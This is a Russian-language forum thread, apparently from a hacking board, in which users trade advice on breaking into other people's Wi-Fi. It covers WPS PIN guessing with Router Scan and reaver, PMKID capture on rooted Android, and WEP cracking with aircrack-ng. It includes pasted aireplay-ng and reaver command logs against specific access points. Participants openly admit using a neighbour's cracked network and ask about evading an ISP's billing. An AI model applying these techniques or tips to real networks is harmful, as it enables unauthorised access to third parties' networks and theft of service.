Это я в качестве примера привел, у 86414227 вероятность 41%, он не подходит как и все остальные. Не понял как может вероятность возрастать, если генератор выдает совсем другой код? И еще на сайте в разделе "Оффлайн генератор WPS PIN Companion из Router Scan" для целевого девайса никаких кодов нет, а у меня в проге их два штуки, кому верить?
Значит остается только полный перебор wps. Онлайн генератору, который и выдал пинкод с вероятностью 41%. Оффлайн генератор тоже полностью прав, не отдавая никаких пинов вообще. Для d-link 300/320 пин-коды не генерируются из MAC адреса, они берутся из статической последовательности. Генератор по сути, гадает пинкод, на основе пинов от роутеров с близким MAC. В роутерскане пинкод выводится на основе известного d-link pin и pin+1 алгоритма. Опираясь только на производителя устройства по MAC, но не на модель устройства. Именно так, совет был дан на случай, если подключение не проходит из-за фильтра.
Можно ли получить PMKID с помощью андроида ? Для этого ведь не нужны ни инжект, ни монитор способности от антенны. Можно ли каким-нибудь приложением получать PMKID там ?
Можно, нужен только рут доступ и бинарник tcpdump под андроид, берется с первой ссылки из гугла. https://antichat.com/threads/464369/page-4#post-4241581
Подскажите, для взлома WEP через aircrack-ng нужно присутствие на целевой точке присоединенных клиентов?
Не хватает прав написать пост в тему самопальной антенны, что делать? https://forum.antichat.ru/threads/28939/page-2
Статус темы: Тема закрыта для ответов. Это значит, она не для Вас закрыта, а вообще!)) А про антенны тут много есть!
Спрошу тут, или где? Перестал платить провайдеру за интернет почти год назад, нет мани, нет услуги , все как положено. Отключил роутер и забыл, присел на ломанный соседский. Сейчас решил проверить и включил роутер, а интернет есть!!! Провайдер старый объединился с другим, зашел в личный кабинет по старому логину, там минус 10 руб. и подпись, что услуга не предоставляется потому как не оплачено, но интернет есть!! Что подскажите? Сменить мак адрес ноута и пользоваться? Что это такое ваще - глюк провайдера? Какие мысли?
Скорее всего. Смена мак вряд ли спасёт.Пользоваться конечно можно.Если баг обнаружат,тебе просто пришлют счёт за весь период.Платить придётся. Возможно,провайдер делает это намерено.
сервер статистики буксует , но по траффику увидят сколько пользовался , как сказал hydra платить придётся , но всё от суммы конечно зависит
Почему-то не получается через reaver добыть пароль, зависает на сообщении Found packet with bad FCS. На двух точках выловил пины, использовать которые пошел в RS, на третьей даже до пина не добрался всё из-за той же ошибки: Code: root@kali:~# aireplay-ng -1 0 -a 6C:3B:6B:A2:EE:52 wlan0mon No source MAC (-h) specified. Using the device MAC (11:FE:ED:32:EF:58) 10:57:05 Waiting for beacon frame (BSSID: 6C:3B:6B:A2:EE:52) on channel 4 10:57:06 Sending Authentication Request (Open System) 10:57:08 Sending Authentication Request (Open System) 10:57:08 Authentication successful 10:57:08 Sending Association Request 10:57:13 Sending Authentication Request (Open System) 10:57:15 Sending Authentication Request (Open System) 10:57:15 Authentication successful 10:57:15 Sending Association Request [ACK] 10:57:15 Association successful :-) (AID: 1) root@kali:~# reaver -A -K -N -S -b 6C:3B:6B:A2:EE:52 -i wlan0mon Reaver v1.6.5 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> [+] Waiting for beacon from 6C:3B:6B:A2:EE:52 [+] Received beacon from 6C:3B:6B:A2:EE:52 [+] Associated with 6C:3B:6B:A2:EE:52 (ESSID: KIDZ) [!] Found packet with bad FCS, skipping...
Я не понимаю, какой смысл использовать reaver, когда весь этот функционал в Router Scan есть, и можно добывать точки по WPS не отходя от кассы (не перезагружаясь в Linux) ?
Bad FCS (Frame Checksum) - битый пакет, не страшно. До пина не доберетесь на этой точке, ибо 6c:3b:6b = Mikrotik Routerboard, у них wps только по нажатию кнопки, пин-кода там нет.
Через reaver я добыл два пина, после того как не смог этого сделать в RS: Code: [*] Associating with AP... [-] Association failed. [*] Associating with AP... [+] Associated with FC:F5:28:66:44:9A (ESSID: Anena). [*] Waiting for pin ""... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [*] Received WPS Start. [*] Sending WPS Message M1... [*] PKE: BB5A0B3E25DC09D5ADE7823DE10BA96BA597EE7244349D0465802D29601C4395BA3A1F6A4F082461D9AEDA93106762DB10DC6384B1E306701C0C3BEA0D8B63797304ACF33043210037CCA2CD50BDFEA1665320616D91601A53EC6F49C89EFAF6F9A681533AAB1764E938472DB7D02D3F34AA4D7CEB21210FF62E619C6D38BA3CD58D304A6CE7D6C601FCA5EB142C0A481A01BAAE4AE714FF8364A9A80247C802FB1D9D21D4E7D382851107B0EDF3AD3F5CA01F848934F9FE8E8DD7E2A4289375 [*] Received WPS Message M2D. [*] R-Nonce: DF72D3B20C59693799A960AD087CC877 [*] Manufacturer: ZyXEL Communications Corp. [*] Model Name: Home Internet Center [*] Model Number: KEENETIC series [*] Serial Number: none [*] Device Name: ZyXEL Internet Center [-] This AP is not able to service enrollee right now. [*] Sending WSC NACK... [*] EAP session closed. [*] Waiting for pin ""... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [*] Received WPS Start. [*] Sending WPS Message M1... [*] PKE: D91D3629F0CBACC1CAC748F7C72C082E45DB47D3751938ED90EBE251ECA9C025887E8F3179B80C538CBA89A5D116CA9A61373A88451855792B329E8AF330327DB08CD557B9DFD2A30AF71C993A835F6F805E93A4446FA9F7922B067A8EF4D18D7E3551338C33E64F1211AB84EED64A747D2F08FE901DAE5009F0DC6C433F218D4A7EF56E9071F03BF845FC2E512781290D0DD0FD4EA9A51B99E99DC147ABB4FEF1335F752769B8E748E29F9B8AF9635358FECAED041440993938391B53396B4B [*] Received WPS Message M2D. [*] R-Nonce: DF72D3B20C59693799A960AD087CC877 [-] This AP is not able to service enrollee right now. [*] Sending WSC NACK... [*] EAP session closed. [*] Waiting for pin ""... [*] Sending EAPOL Start... . Из одного из них удалось выловить пароль, второй пока не дается.
Спасибо за разъяснение. Кто еще из производителей использовать пины не дает? И что делать если подключений к ТД нет и выловить ХШ нельзя, есть ли вариант кроме брута?
Это я пытался всеми возможными способами поломать WPS Mikrotik, который как оказалось не ломается , а документации никакой нет. Упарился уже ломать DIR-300, не зря его выше говнодевайсом назвали , теперь он сообщает WPS pin not found! Вот здесь нашел список пинов, насколько понимаю в RS их использовать не получится из-за ошибки доставки М4, а можно ли сделать так чтобы reaver файлик с кодами прожевал?
А почему beacon пакет не ловится андроидом, приходится отдельно записывать какой мак какому имени точки соответствует, можно ли андроидом еще и beacon хватать, в котором имя точки.
